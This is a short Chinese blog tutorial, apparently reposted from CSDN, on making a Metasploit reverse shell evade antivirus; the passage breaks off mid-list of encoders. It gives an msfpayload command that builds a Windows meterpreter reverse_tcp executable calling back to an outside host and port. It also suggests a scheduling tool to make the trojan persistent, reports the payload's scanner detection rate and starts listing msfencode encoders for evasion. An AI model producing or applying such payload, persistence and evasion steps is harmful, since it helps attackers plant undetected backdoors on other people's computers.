系统相关
首页 > 系统相关> > Metasploit reverse Shell的免杀(炊少教学)

Metasploit reverse Shell的免杀(炊少教学)

作者:互联网

rootkithat是我以前的马甲 以前写的文章

我们先生成一个X64的WINDOWS XP 的reverse SHELL

1
2
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe

提示:你可以用 scheduleme -m 1 -u e /tmp/x64.exe 让你的木马更持久

提交到世界杀毒网

——————————————
8%的杀软(3/37)报告发现病毒,我们来加密他,让他到达免杀的效果
查看metasploit自带的加密模块

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l 
 Framework
Encoders==================  Name Rank Description ---- ----
----------- cmd/generic_sh good Generic Shell Variable Substitution
Command Encoder cmd/ifs low Generic ${IFS} Substitution Command
Encoder cmd/printf_php_mq manual printf(1) via PHP m

标签:Metasploit,Shell,reverse,rootkithat,cmd,Encoder,msf3
来源: https://blog.csdn.net/weiliang369/article/details/123130498